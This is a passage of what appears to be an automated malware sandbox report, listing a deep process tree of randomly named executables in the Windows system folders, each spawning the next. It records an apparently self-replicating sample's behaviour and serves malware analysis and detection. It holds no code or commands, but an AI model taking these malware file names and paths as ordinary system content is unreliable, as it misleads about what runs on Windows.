        C:\Windows\system32\Paplmibh.exe
        164⤵
        
        PID:24448
        
        C:\Windows\SysWOW64\Pnfilm32.exe
        
        C:\Windows\system32\Pnfilm32.exe
        165⤵
        
        PID:18280
        
        C:\Windows\SysWOW64\Aobhhk32.exe
        
        C:\Windows\system32\Aobhhk32.exe
        166⤵
        
        PID:23800
        
        C:\Windows\SysWOW64\Agmmlm32.exe
        
        C:\Windows\system32\Agmmlm32.exe
        167⤵
        
        PID:23960
        
        C:\Windows\SysWOW64\Baenoepp.exe
        
        C:\Windows\system32\Baenoepp.exe
        168⤵
        
        PID:21796
        
        C:\Windows\SysWOW64\Bhacapej.exe
        
        C:\Windows\system32\Bhacapej.exe
        169⤵
        
        PID:24372
        
        C:\Windows\SysWOW64\Bdjqlpik.exe
        
        C:\Windows\system32\Bdjqlpik.exe
        170⤵
        
        PID:23568
        
        C:\Windows\SysWOW64\Cngnpelf.exe
        
        C:\Windows\system32\Cngnpelf.exe
        171⤵
        
        PID:24060
        
        C:\Windows\SysWOW64\Caegfc32.exe
        
        C:\Windows\system32\Caegfc32.exe
        172⤵
        
        PID:20572
        
        C:\Windows\SysWOW64\Coldegod.exe
        
        C:\Windows\system32\Coldegod.exe
        173⤵
        
        PID:23608
        
        C:\Windows\SysWOW64\Chdinmed.exe
        
        C:\Windows\system32\Chdinmed.exe
        174⤵
        
        PID:23884
        
        C:\Windows\SysWOW64\Dopnpf32.exe
        
        C:\Windows\system32\Dopnpf32.exe
        175⤵
        
        PID:24356
        
        C:\Windows\SysWOW64\Dddlil32.exe
        
        C:\Windows\system32\Dddlil32.exe
        176⤵
        
        PID:23404
        
        C:\Windows\SysWOW64\Eojqfe32.exe
        
        C:\Windows\system32\Eojqfe32.exe
        177⤵
        
        PID:24108
        
        C:\Windows\SysWOW64\Eggbpgnl.exe
        
        C:\Windows\system32\Eggbpgnl.exe
        178⤵
        
        PID:22316
        
        C:\Windows\SysWOW64\Ehgnjj32.exe
        
        C:\Windows\system32\Ehgnjj32.exe
        179⤵
        
        PID:22348
        
        C:\Windows\SysWOW64\Ebapho32.exe
        
        C:\Windows\system32\Ebapho32.exe
        180⤵
        
        PID:24428
        
        C:\Windows\SysWOW64\Fgcaleco.exe
        
        C:\Windows\system32\Fgcaleco.exe
        181⤵
        
        PID:24412
        
        C:\Windows\SysWOW64\Feioki32.exe
        
        C:\Windows\system32\Feioki32.exe
        182⤵
        
        PID:24752
        
        C:\Windows\SysWOW64\Gphfna32.exe
        
        C:\Windows\system32\Gphfna32.exe
        183⤵
        
        PID:25128
        
        C:\Windows\SysWOW64\Iiofhd32.exe
        
        C:\Windows\system32\Iiofhd32.exe
        184⤵
        
        PID:25408
        
        C:\Windows\SysWOW64\Ipkkkn32.exe
        
        C:\Windows\system32\Ipkkkn32.exe
        185⤵
        
        PID:25548
        
        C:\Windows\SysWOW64\Ipmhpn32.exe
        
        C:\Windows\system32\Ipmhpn32.exe
        186⤵
        
        PID:19312
        
        C:\Windows\SysWOW64\Ihkijpaa.exe
        
        C:\Windows\system32\Ihkijpaa.exe
        187⤵
        
        PID:24624
        
        C:\Windows\SysWOW64\Jbbjmh32.exe
        
        C:\Windows\system32\Jbbjmh32.exe
        188⤵
        
        PID:24840
        
        C:\Windows\SysWOW64\Jolhhi32.exe
        
        C:\Windows\system32\Jolhhi32.exe
        189⤵
        
        PID:24920
        
        C:\Windows\SysWOW64\Jbjqngim.exe
        
        C:\Windows\system32\Jbjqngim.exe
        190⤵
        
        PID:21428
        
        C:\Windows\SysWOW64\Kaonodme.exe
        
        C:\Windows\system32\Kaonodme.exe
        191⤵
        
        PID:25164
        
        C:\Windows\SysWOW64\Kihbeald.exe
        
        C:\Windows\system32\Kihbeald.exe
        192⤵
        
        PID:25228
        
        C:\Windows\SysWOW64\Kpiqcj32.exe
        
        C:\Windows\system32\Kpiqcj32.exe
        193⤵
        
        PID:25484
        
        C:\Windows\SysWOW64\Lhioblgo.exe
        
        C:\Windows\system32\Lhioblgo.exe
        194⤵
        
        PID:25404
        
        C:\Windows\SysWOW64\Mbhilp32.exe
        
        C:\Windows\system32\Mbhilp32.exe
        195⤵
        
        PID:24804
        
        C:\Windows\SysWOW64\Mfkkmn32.exe
        
        C:\Windows\system32\Mfkkmn32.exe
        196⤵
        
        PID:21468
        
        C:\Windows\SysWOW64\Nmofpgik.exe
        
        C:\Windows\system32\Nmofpgik.exe
        197⤵
        
        PID:25432
        
        C:\Windows\SysWOW64\Ofnajk32.exe
        
        C:\Windows\system32\Ofnajk32.exe
        198⤵
        
        PID:22392
        
        C:\Windows\SysWOW64\Pajkgc32.exe
        
        C:\Windows\system32\Pajkgc32.exe
        199⤵
        
        PID:21956
        
        C:\Windows\SysWOW64\Apkhdn32.exe
        
        C:\Windows\system32\Apkhdn32.exe
        200⤵
        
        PID:25476
        
        C:\Windows\SysWOW64\Aamadpbl.exe
        
        C:\Windows\system32\Aamadpbl.exe
        201⤵
        
        PID:24748
        
        C:\Windows\SysWOW64\Bmmdoppe.exe
        
        C:\Windows\system32\Bmmdoppe.exe
        202⤵
        
        PID:24736
        
        C:\Windows\SysWOW64\Cgaidd32.exe
        
        C:\Windows\system32\Cgaidd32.exe
        203⤵
        
        PID:25232
        
        C:\Windows\SysWOW64\Cgdeicjf.exe
        
        C:\Windows\system32\Cgdeicjf.exe
        204⤵
        
        PID:20400
        
        C:\Windows\SysWOW64\Ddhfbhip.exe
        
        C:\Windows\system32\Ddhfbhip.exe
        205⤵
        
        PID:22760
        
        C:\Windows\SysWOW64\Ddlong32.exe
        
        C:\Windows\system32\Ddlong32.exe
        206⤵
        
        PID:22168
        
        C:\Windows\SysWOW64\Egfkfa32.exe
        
        C:\Windows\system32\Egfkfa32.exe
        207⤵
        
        PID:25648
        
        C:\Windows\SysWOW64\Ecmlkb32.exe
        
        C:\Windows\system32\Ecmlkb32.exe
        208⤵
        
        PID:25740
        
        C:\Windows\SysWOW64\Fckhlpce.exe
        
        C:\Windows\system32\Fckhlpce.exe
        209⤵
        
        PID:26132
        
        C:\Windows\SysWOW64\Gnefdh32.exe
        
        C:\Windows\system32\Gnefdh32.exe
        210⤵
        
        PID:26308
        
        C:\Windows\SysWOW64\Gkifnl32.exe
        
        C:\Windows\system32\Gkifnl32.exe
        211⤵
        
        PID:26436
        
        C:\Windows\SysWOW64\Heiqgaoh.exe
        
        C:\Windows\system32\Heiqgaoh.exe
        212⤵
        
        PID:26552
        
        C:\Windows\SysWOW64\Hkefikdb.exe
        
        C:\Windows\system32\Hkefikdb.exe
        213⤵
        
        PID:25340
        
        C:\Windows\SysWOW64\Hjjbkg32.exe
        
        C:\Windows\system32\Hjjbkg32.exe
        214⤵
        
        PID:25640
        
        C:\Windows\SysWOW64\Iaggma32.exe
        
        C:\Windows\system32\Iaggma32.exe
        215⤵
        
        PID:25756
        
        C:\Windows\SysWOW64\Inangdge.exe
        
        C:\Windows\system32\Inangdge.exe
        216⤵
        
        PID:26004
        
        C:\Windows\SysWOW64\Jebmdm32.exe
        
        C:\Windows\system32\Jebmdm32.exe
        217⤵
        
        PID:26328
        
        C:\Windows\SysWOW64\Khjlgg32.exe
        
        C:\Windows\system32\Khjlgg32.exe
        218⤵
        
        PID:26476
        
        C:\Windows\SysWOW64\Kknanbja.exe
        
        C:\Windows\system32\Kknanbja.exe
        219⤵
        
        PID:20768
        
        C:\Windows\SysWOW64\Lejlljdp.exe
        
        C:\Windows\system32\Lejlljdp.exe
        220⤵
        
        PID:13388
        
        C:\Windows\SysWOW64\Loemjo32.exe
        
        C:\Windows\system32\Loemjo32.exe
        221⤵
        
        PID:25788
        
        C:\Windows\SysWOW64\Mahbaj32.exe
        
        C:\Windows\system32\Mahbaj32.exe
        222⤵
        
        PID:25984
        
        C:\Windows\SysWOW64\Mkbcpohj.exe
        
        C:\Windows\system32\Mkbcpohj.exe
        223⤵
        
        PID:25396
        
        C:\Windows\SysWOW64\Nkjjqnba.exe
        
        C:\Windows\system32\Nkjjqnba.exe
        224⤵
        
        PID:20372
        
        C:\Windows\SysWOW64\Nhbcea32.exe
        
        C:\Windows\system32\Nhbcea32.exe
        225⤵
        
        PID:24932
        
        C:\Windows\SysWOW64\Odidjbbj.exe
        
        C:\Windows\system32\Odidjbbj.exe
        226⤵
        
        PID:25736
        
        C:\Windows\SysWOW64\Odnneb32.exe
        
        C:\Windows\system32\Odnneb32.exe
        227⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\Odpjkalb.exe
        
        C:\Windows\system32\Odpjkalb.exe
        228⤵
        
        PID:21408
        
        C:\Windows\SysWOW64\Pfbcjdab.exe
        
        C:\Windows\system32\Pfbcjdab.exe
        229⤵
        
        PID:26464
        
        C:\Windows\SysWOW64\Pkfbcj32.exe
        
        C:\Windows\system32\Pkfbcj32.exe
        230⤵
        
        PID:25892
        
        C:\Windows\SysWOW64\Qeqcao32.exe
        
        C:\Windows\system32\Qeqcao32.exe
        231⤵
        
        PID:26316
        
        C:\Windows\SysWOW64\Aeemmojj.exe
        
        C:\Windows\system32\Aeemmojj.exe
        232⤵
        
        PID:25708
        
        C:\Windows\SysWOW64\Aiebhmnn.exe
        
        C:\Windows\system32\Aiebhmnn.exe
        233⤵
        
        PID:26420
        
        C:\Windows\SysWOW64\Bbemba32.exe
        
        C:\Windows\system32\Bbemba32.exe
        234⤵
        
        PID:27248
        
        C:\Windows\SysWOW64\Beefcl32.exe
        
        C:\Windows\system32\Beefcl32.exe
        235⤵
        
        PID:27288
        
        C:\Windows\SysWOW64\Blpnpfcd.exe
        
        C:\Windows\system32\Blpnpfcd.exe
        236⤵
        
        PID:27324
        
        C:\Windows\SysWOW64\Bdicgc32.exe
        
        C:\Windows\system32\Bdicgc32.exe
        237⤵
        
        PID:27372
        
        C:\Windows\SysWOW64\Cihhejni.exe
        
        C:\Windows\system32\Cihhejni.exe
        238⤵
        
        PID:27408
        
        C:\Windows\SysWOW64\Cbqlnp32.exe
        
        C:\Windows\system32\Cbqlnp32.exe
        239⤵
        
        PID:27444
        
        C:\Windows\SysWOW64\Cmhmqhbl.exe
        
        C:\Windows\system32\Cmhmqhbl.exe
        240⤵
        
        PID:27480
        
        C:\Windows\SysWOW64\Dpkchc32.exe
        
        C:\Windows\system32\Dpkchc32.exe
        241⤵
        
        PID:27556
        
        C:\Windows\SysWOW64\Dfhhjmbe.exe
        
        C:\Windows\system32\Dfhhjmbe.exe
        242⤵
        
        PID:20428
        
        C:\Windows\SysWOW64\Dboionhi.exe
        
        C:\Windows\system32\Dboionhi.exe
        243⤵
        
        PID:26592
        
        C:\Windows\SysWOW64\Emifgf32.exe
        
        C:\Windows\system32\Emifgf32.exe
        244⤵
        
        PID:8016
        
        C:\Windows\SysWOW64\Emkcme32.exe
        
        C:\Windows\system32\Emkcme32.exe
        245⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\Eeidggmp.exe
        
        C:\Windows\system32\Eeidggmp.exe
        246⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\Fpeoeogm.exe
        
        C:\Windows\system32\Fpeoeogm.exe
        247⤵
        
        PID:8340
        
        C:\Windows\SysWOW64\Fpgkjoek.exe
        
        C:\Windows\system32\Fpgkjoek.exe
        248⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Ffgqhe32.exe
        
        C:\Windows\system32\Ffgqhe32.exe
        249⤵
        
        PID:8656
        
        C:\Windows\SysWOW64\Ggfmbhhb.exe
        
        C:\Windows\system32\Ggfmbhhb.exe
        250⤵
        
        PID:14044
        
        C:\Windows\SysWOW64\Gneojb32.exe
        
        C:\Windows\system32\Gneojb32.exe
        251⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\Gqehlm32.exe
        
        C:\Windows\system32\Gqehlm32.exe
        252⤵
        
        PID:6888
        
        C:\Windows\SysWOW64\Hfgjoccm.exe
        
        C:\Windows\system32\Hfgjoccm.exe
        253⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\Hggfifjp.exe
        
        C:\Windows\system32\Hggfifjp.exe
        254⤵
        
        PID:6916
        
        C:\Windows\SysWOW64\Hcpccgna.exe
        
        C:\Windows\system32\Hcpccgna.exe
        255⤵
        
        PID:11296
        
        C:\Windows\SysWOW64\Icbpiflo.exe
        
        C:\Windows\system32\Icbpiflo.exe
        256⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\Kmbdihnd.exe
        
        C:\Windows\system32\Kmbdihnd.exe
        257⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\Kadfkfpe.exe
        
        C:\Windows\system32\Kadfkfpe.exe
        258⤵
        
        PID:8080
        
        C:\Windows\SysWOW64\Nkkplglc.exe
        
        C:\Windows\system32\Nkkplglc.exe
        259⤵
        
        PID:10108
        
        C:\Windows\SysWOW64\Phpili32.exe
        
        C:\Windows\system32\Phpili32.exe
        260⤵
        
        PID:14792
        
        C:\Windows\SysWOW64\Pgefmf32.exe
        
        C:\Windows\system32\Pgefmf32.exe
        261⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\Phgomh32.exe
        
        C:\Windows\system32\Phgomh32.exe
        262⤵
        
        PID:7188
        
        C:\Windows\SysWOW64\Qnfdjocg.exe
        
        C:\Windows\system32\Qnfdjocg.exe
        263⤵
        
        PID:8632
        
        C:\Windows\SysWOW64\Qhkhhhcm.exe
        
        C:\Windows\system32\Qhkhhhcm.exe
        264⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\Qfoialaf.exe
        
        C:\Windows\system32\Qfoialaf.exe
        265⤵
        
        PID:9644
        
        C:\Windows\SysWOW64\Anjnenoa.exe
        
        C:\Windows\system32\Anjnenoa.exe
        266⤵
        
        PID:6680
        
        C:\Windows\SysWOW64\Anadfmij.exe
        
        C:\Windows\system32\Anadfmij.exe
        267⤵
        
        PID:11408
        
        C:\Windows\SysWOW64\Benihgnd.exe
        
        C:\Windows\system32\Benihgnd.exe
        268⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\Bbbibkmm.exe
        
        C:\Windows\system32\Bbbibkmm.exe
        269⤵
        
        PID:18844
        
        C:\Windows\SysWOW64\Bebbcfjo.exe
        
        C:\Windows\system32\Bebbcfjo.exe
        270⤵
        
        PID:8680
        
        C:\Windows\SysWOW64\Biqkjeqe.exe
        
        C:\Windows\system32\Biqkjeqe.exe
        271⤵
        
        PID:8840
        
        C:\Windows\SysWOW64\Cijnpchj.exe
        
        C:\Windows\system32\Cijnpchj.exe
        272⤵
        
        PID:11348
        
        C:\Windows\SysWOW64\Ceckjdll.exe
        
        C:\Windows\system32\Ceckjdll.exe
        273⤵
        
        PID:13240
        
        C:\Windows\SysWOW64\Dbgldhke.exe
        
        C:\Windows\system32\Dbgldhke.exe
        274⤵
        
        PID:11780
        
        C:\Windows\SysWOW64\Dopining.exe
        
        C:\Windows\system32\Dopining.exe
        275⤵
        
        PID:8772
        
        C:\Windows\SysWOW64\Dfljkf32.exe
        
        C:\Windows\system32\Dfljkf32.exe
        276⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\Eiopbqfb.exe
        
        C:\Windows\system32\Eiopbqfb.exe
        277⤵
        
        PID:8484
        
        C:\Windows\SysWOW64\Epnbjjij.exe
        
        C:\Windows\system32\Epnbjjij.exe
        278⤵
        
        PID:12968
        
        C:\Windows\SysWOW64\Fhkccl32.exe
        
        C:\Windows\system32\Fhkccl32.exe
        279⤵
        
        PID:9568
        
        C:\Windows\SysWOW64\Foghff32.exe
        
        C:\Windows\system32\Foghff32.exe
        280⤵
        
        PID:13084
        
        C:\Windows\SysWOW64\Fiafnnfm.exe
        
        C:\Windows\system32\Fiafnnfm.exe
        281⤵
        
        PID:14548
        
        C:\Windows\SysWOW64\Ghgcoj32.exe
        
        C:\Windows\system32\Ghgcoj32.exe
        282⤵
        
        PID:13308
        
        C:\Windows\SysWOW64\Gempnngl.exe
        
        C:\Windows\system32\Gempnngl.exe
        283⤵
        
        PID:11068
        
        C:\Windows\SysWOW64\Gepmdn32.exe
        
        C:\Windows\system32\Gepmdn32.exe
        284⤵
        
        PID:8688
        
        C:\Windows\SysWOW64\Gjmejllp.exe
        
        C:\Windows\system32\Gjmejllp.exe
        285⤵
        
        PID:11488
        
        C:\Windows\SysWOW64\Hjpbpl32.exe
        
        C:\Windows\system32\Hjpbpl32.exe
        286⤵
        
        PID:9436
        
        C:\Windows\SysWOW64\Homjhb32.exe
        
        C:\Windows\system32\Homjhb32.exe
        287⤵
        
        PID:9648
        
        C:\Windows\SysWOW64\Hpncge32.exe
        
        C:\Windows\system32\Hpncge32.exe
        288⤵
        
        PID:15340
        
        C:\Windows\SysWOW64\Hjghpkce.exe
        
        C:\Windows\system32\Hjghpkce.exe
        289⤵
        
        PID:9492
        
        C:\Windows\SysWOW64\Hgkijobo.exe
        
        C:\Windows\system32\Hgkijobo.exe
        290⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\Icaiophc.exe
        
        C:\Windows\system32\Icaiophc.exe
        291⤵
        
        PID:11952
        
        C:\Windows\SysWOW64\Imjnge32.exe
        
        C:\Windows\system32\Imjnge32.exe
        292⤵
        
        PID:10960
        
        C:\Windows\SysWOW64\Iokgiqld.exe
        
        C:\Windows\system32\Iokgiqld.exe
        293⤵
        
        PID:12844
        
        C:\Windows\SysWOW64\Ioopdp32.exe
        
        C:\Windows\system32\Ioopdp32.exe
        294⤵
        
        PID:8420
        
        C:\Windows\SysWOW64\Jqomncob.exe
        
        C:\Windows\system32\Jqomncob.exe
        295⤵
        
        PID:6504
        
        C:\Windows\SysWOW64\Jgkaqmdl.exe
        
        C:\Windows\system32\Jgkaqmdl.exe
        296⤵
        
        PID:328
        
        C:\Windows\SysWOW64\Kjqdmg32.exe
        
        C:\Windows\system32\Kjqdmg32.exe
        297⤵
        
        PID:10588
        
        C:\Windows\SysWOW64\Kfgdbh32.exe
        
        C:\Windows\system32\Kfgdbh32.exe
        298⤵
        
        PID:10264
        
        C:\Windows\SysWOW64\Kmcjdbhf.exe
        
        C:\Windows\system32\Kmcjdbhf.exe
        299⤵
        
        PID:14048
        
        C:\Windows\SysWOW64\Laflfp32.exe
        
        C:\Windows\system32\Laflfp32.exe
        300⤵
        
        PID:10152
        
        C:\Windows\SysWOW64\Lhemni32.exe
        
        C:\Windows\system32\Lhemni32.exe
        301⤵
        
        PID:16488
        
        C:\Windows\SysWOW64\Lambfodo.exe
        
        C:\Windows\system32\Lambfodo.exe
        302⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\Mmkilo32.exe
        
        C:\Windows\system32\Mmkilo32.exe
        303⤵
        
        PID:13032
        
        C:\Windows\SysWOW64\Nhgcjf32.exe
        
        C:\Windows\system32\Nhgcjf32.exe
        304⤵
        
        PID:14864
        
        C:\Windows\SysWOW64\Ndqqdgak.exe
        
        C:\Windows\system32\Ndqqdgak.exe
        305⤵
        
        PID:19548
        
        C:\Windows\SysWOW64\Ngaifb32.exe
        
        C:\Windows\system32\Ngaifb32.exe
        306⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\Ohcbfe32.exe
        
        C:\Windows\system32\Ohcbfe32.exe
        307⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\Opcqefma.exe
        
        C:\Windows\system32\Opcqefma.exe
        308⤵
        
        PID:8796
        
        C:\Windows\SysWOW64\Pnngojec.exe
        
        C:\Windows\system32\Pnngojec.exe
        309⤵
        
        PID:12164
        
        C:\Windows\SysWOW64\Pjehdk32.exe
        
        C:\Windows\system32\Pjehdk32.exe
        310⤵
        
        PID:17616
        
        C:\Windows\SysWOW64\Qdmigcik.exe
        
        C:\Windows\system32\Qdmigcik.exe
        311⤵
        
        PID:3096
        
        C:\Windows\SysWOW64\Qdofmcgh.exe
        
        C:\Windows\system32\Qdofmcgh.exe
        312⤵
        
        PID:10020
        
        C:\Windows\SysWOW64\Adabbb32.exe
        
        C:\Windows\system32\Adabbb32.exe
        313⤵
        
        PID:8936
        
        C:\Windows\SysWOW64\Ajeakhme.exe
        
        C:\Windows\system32\Ajeakhme.exe
        314⤵
        
        PID:9220
        
        C:\Windows\SysWOW64\Bqafmbbo.exe
        
        C:\Windows\system32\Bqafmbbo.exe
        315⤵
        
        PID:6712
        
        C:\Windows\SysWOW64\Bjlglggm.exe
        
        C:\Windows\system32\Bjlglggm.exe
        316⤵
        
        PID:11028
        
        C:\Windows\SysWOW64\Bjodagej.exe
        
        C:\Windows\system32\Bjodagej.exe
        317⤵
        
        PID:10828
        
        C:\Windows\SysWOW64\Cnoimein.exe
        
        C:\Windows\system32\Cnoimein.exe
        318⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\Cnafbe32.exe
        
        C:\Windows\system32\Cnafbe32.exe
        319⤵
        
        PID:13824
        
        C:\Windows\SysWOW64\Ceknoonh.exe
        
        C:\Windows\system32\Ceknoonh.exe
        320⤵
        
        PID:10800
        
        C:\Windows\SysWOW64\Ckgcaidb.exe
        
        C:\Windows\system32\Ckgcaidb.exe
        321⤵
        
        PID:14072
        
        C:\Windows\SysWOW64\Cgndfj32.exe
        
        C:\Windows\system32\Cgndfj32.exe
        322⤵
        
        PID:10360
        
        C:\Windows\SysWOW64\Caghoopg.exe
        
        C:\Windows\system32\Caghoopg.exe
        323⤵
        
        PID:11392
        
        C:\Windows\SysWOW64\Dklmmh32.exe
        
        C:\Windows\system32\Dklmmh32.exe
        324⤵
        
        PID:13736
        
        C:\Windows\SysWOW64\Dakajo32.exe
        
        C:\Windows\system32\Dakajo32.exe
        325⤵
        
        PID:17176
        
        C:\Windows\SysWOW64\Dndlob32.exe
        
        C:\Windows\system32\Dndlob32.exe
        326⤵
        
        PID:15260
        
        C:\Windows\SysWOW64\Ehommgkd.exe
        
        C:\Windows\system32\Ehommgkd.exe
        327⤵
        
        PID:12932
        
        C:\Windows\SysWOW64\Elmeceaj.exe
        
        C:\Windows\system32\Elmeceaj.exe
        328⤵
        
        PID:8976
        
        C:\Windows\SysWOW64\Elobieph.exe
        
        C:\Windows\system32\Elobieph.exe
        329⤵
        
        PID:16120
        
        C:\Windows\SysWOW64\Fejcgjde.exe
        
        C:\Windows\system32\Fejcgjde.exe
        330⤵
        
        PID:12836
        
        C:\Windows\SysWOW64\Foddfphc.exe
        
        C:\Windows\system32\Foddfphc.exe
        331⤵
        
        PID:14480
        
        C:\Windows\SysWOW64\Fbbmln32.exe
        
        C:\Windows\system32\Fbbmln32.exe
        332⤵
        
        PID:9576
        
        C:\Windows\SysWOW64\Flmnjc32.exe
        
        C:\Windows\system32\Flmnjc32.exe
        333⤵
        
        PID:11216
        
        C:\Windows\SysWOW64\Galchjpl.exe
        
        C:\Windows\system32\Galchjpl.exe
        334⤵
        
        PID:15008
        
        C:\Windows\SysWOW64\Gbnmhldl.exe
        
        C:\Windows\system32\Gbnmhldl.exe
        335⤵
        
        PID:22980
        
        C:\Windows\SysWOW64\Ghkepccd.exe
        
        C:\Windows\system32\Ghkepccd.exe
        336⤵
        
        PID:15220
        
        C:\Windows\SysWOW64\Hcbfcl32.exe
        
        C:\Windows\system32\Hcbfcl32.exe
        337⤵
        
        PID:10368
        
        C:\Windows\SysWOW64\Hiokeefa.exe
        
        C:\Windows\system32\Hiokeefa.exe
        338⤵
        
        PID:10692
        
        C:\Windows\SysWOW64\Hiahke32.exe
        
        C:\Windows\system32\Hiahke32.exe
        339⤵
        
        PID:11080
        
        C:\Windows\SysWOW64\Haoidgog.exe
        
        C:\Windows\system32\Haoidgog.exe
        340⤵
        
        PID:15120
        
        C:\Windows\SysWOW64\Hocjnknq.exe
        
        C:\Windows\system32\Hocjnknq.exe
        341⤵
        
        PID:11476
        
        C:\Windows\SysWOW64\Iccojibd.exe
        
        C:\Windows\system32\Iccojibd.exe
        342⤵
        
        PID:21088
        
        C:\Windows\SysWOW64\Ijmgfc32.exe
        
        C:\Windows\system32\Ijmgfc32.exe
        343⤵
        
        PID:11728
        
        C:\Windows\SysWOW64\Iahlkf32.exe
        
        C:\Windows\system32\Iahlkf32.exe
        344⤵
        
        PID:11164
        
        C:\Windows\SysWOW64\Ijbaacfl.exe
        
        C:\Windows\system32\Ijbaacfl.exe
        345⤵
        
        PID:12040
        
        C:\Windows\SysWOW64\Jcjejh32.exe
        
        C:\Windows\system32\Jcjejh32.exe
        346⤵
        
        PID:10048
        
        C:\Windows\SysWOW64\Jkhgdjge.exe
        
        C:\Windows\system32\Jkhgdjge.exe
        347⤵
        
        PID:14428
        
        C:\Windows\SysWOW64\Jkjcjj32.exe
        
        C:\Windows\system32\Jkjcjj32.exe
        348⤵
        
        PID:11736
        
        C:\Windows\SysWOW64\Jklpoj32.exe
        
        C:\Windows\system32\Jklpoj32.exe
        349⤵
        
        PID:10536
        
        C:\Windows\SysWOW64\Kojieh32.exe
        
        C:\Windows\system32\Kojieh32.exe
        350⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\Kchalfpl.exe
        
        C:\Windows\system32\Kchalfpl.exe
        351⤵
        
        PID:17456
        
        C:\Windows\SysWOW64\Koaofgdn.exe
        
        C:\Windows\system32\Koaofgdn.exe
        352⤵
        
        PID:11232
        
        C:\Windows\SysWOW64\Kcohlejd.exe
        
        C:\Windows\system32\Kcohlejd.exe
        353⤵
        
        PID:11188
        
        C:\Windows\SysWOW64\Lbddmb32.exe
        
        C:\Windows\system32\Lbddmb32.exe
        354⤵
        
        PID:12020
        
        C:\Windows\SysWOW64\Ljnidoml.exe
        
        C:\Windows\system32\Ljnidoml.exe
        355⤵
        
        PID:23392
        
        C:\Windows\SysWOW64\Lmobfjjm.exe
        
        C:\Windows\system32\Lmobfjjm.exe
        356⤵
        
        PID:12440
        
        C:\Windows\SysWOW64\Lpokge32.exe
        
        C:\Windows\system32\Lpokge32.exe
        357⤵
        
        PID:12396
        
        C:\Windows\SysWOW64\Mflpjomh.exe
        
        C:\Windows\system32\Mflpjomh.exe
        358⤵
        
        PID:16152
        
        C:\Windows\SysWOW64\Mpfahdaf.exe
        
        C:\Windows\system32\Mpfahdaf.exe
        359⤵
        
        PID:12732
        
        C:\Windows\SysWOW64\Mcggdbfj.exe
        
        C:\Windows\system32\Mcggdbfj.exe
        360⤵
        
        PID:12060
        
        C:\Windows\SysWOW64\Njclflkd.exe
        
        C:\Windows\system32\Njclflkd.exe
        361⤵
        
        PID:11284
        
        C:\Windows\SysWOW64\Njehllia.exe
        
        C:\Windows\system32\Njehllia.exe
        362⤵
        
        PID:12780
        
        C:\Windows\SysWOW64\Njheak32.exe
        
        C:\Windows\system32\Njheak32.exe
        363⤵
        
        PID:17504
        
        C:\Windows\SysWOW64\Ndbfpq32.exe
        
        C:\Windows\system32\Ndbfpq32.exe
        364⤵
        
        PID:14912
        
        C:\Windows\SysWOW64\Oihanf32.exe
        
        C:\Windows\system32\Oihanf32.exe
        365⤵
        
        PID:10972
        
        C:\Windows\SysWOW64\Pkjkni32.exe
        
        C:\Windows\system32\Pkjkni32.exe
        366⤵
        
        PID:12764
        
        C:\Windows\SysWOW64\Pchlgk32.exe
        
        C:\Windows\system32\Pchlgk32.exe
        367⤵
        
        PID:18248
        
        C:\Windows\SysWOW64\Pidajd32.exe
        
        C:\Windows\system32\Pidajd32.exe
        368⤵
        
        PID:5156
        
        C:\Windows\SysWOW64\Qpccan32.exe
        
        C:\Windows\system32\Qpccan32.exe
        369⤵
        
        PID:21568
        
        C:\Windows\SysWOW64\Aplehm32.exe
        
        C:\Windows\system32\Aplehm32.exe
        370⤵
        
        PID:15792
        
        C:\Windows\SysWOW64\Bkipfd32.exe
        
        C:\Windows\system32\Bkipfd32.exe
        371⤵
        
        PID:13720
        
        C:\Windows\SysWOW64\Bjnmgqao.exe
        
        C:\Windows\system32\Bjnmgqao.exe
        372⤵
        
        PID:12784
        
        C:\Windows\SysWOW64\Cqmoojdf.exe
        
        C:\Windows\system32\Cqmoojdf.exe
        373⤵
        
        PID:17244
        
        C:\Windows\SysWOW64\Cgicadjp.exe
        
        C:\Windows\system32\Cgicadjp.exe
        374⤵
        
        PID:22108
        
        C:\Windows\SysWOW64\Cnehcn32.exe
        
        C:\Windows\system32\Cnehcn32.exe
        375⤵
        
        PID:15896
        
        C:\Windows\SysWOW64\Djnfnn32.exe
        
        C:\Windows\system32\Djnfnn32.exe
        376⤵
        
        PID:12572
        
        C:\Windows\SysWOW64\Dqkkph32.exe
        
        C:\Windows\system32\Dqkkph32.exe
        377⤵
        
        PID:22228
        
        C:\Windows\SysWOW64\Dkblcqfi.exe
        
        C:\Windows\system32\Dkblcqfi.exe
        378⤵
        
        PID:9248
        
        C:\Windows\SysWOW64\Encedlcj.exe
        
        C:\Windows\system32\Encedlcj.exe
        379⤵
        
        PID:11308
        
        C:\Windows\SysWOW64\Egnfcahh.exe
        
        C:\Windows\system32\Egnfcahh.exe
        380⤵
        
        PID:15412
        
        C:\Windows\SysWOW64\Eegpgd32.exe
        
        C:\Windows\system32\Eegpgd32.exe
        381⤵
        
        PID:20040
        
        C:\Windows\SysWOW64\Fmkgbe32.exe
        
        C:\Windows\system32\Fmkgbe32.exe
        382⤵
        
        PID:14488
        
        C:\Windows\SysWOW64\Gmpqmecg.exe
        
        C:\Windows\system32\Gmpqmecg.exe
        383⤵
        
        PID:7568
        
        C:\Windows\SysWOW64\Ganiccjn.exe
        
        C:\Windows\system32\Ganiccjn.exe
        384⤵
        
        PID:13876
        
        C:\Windows\SysWOW64\Hoipmfbp.exe
        
        C:\Windows\system32\Hoipmfbp.exe
        385⤵
        
        PID:19556
        
        C:\Windows\SysWOW64\Hhfnakek.exe
        
        C:\Windows\system32\Hhfnakek.exe
        386⤵
        
        PID:14840
        
        C:\Windows\SysWOW64\Imecob32.exe
        
        C:\Windows\system32\Imecob32.exe
        387⤵
        
        PID:22412
        
        C:\Windows\SysWOW64\Ihoqgjmp.exe
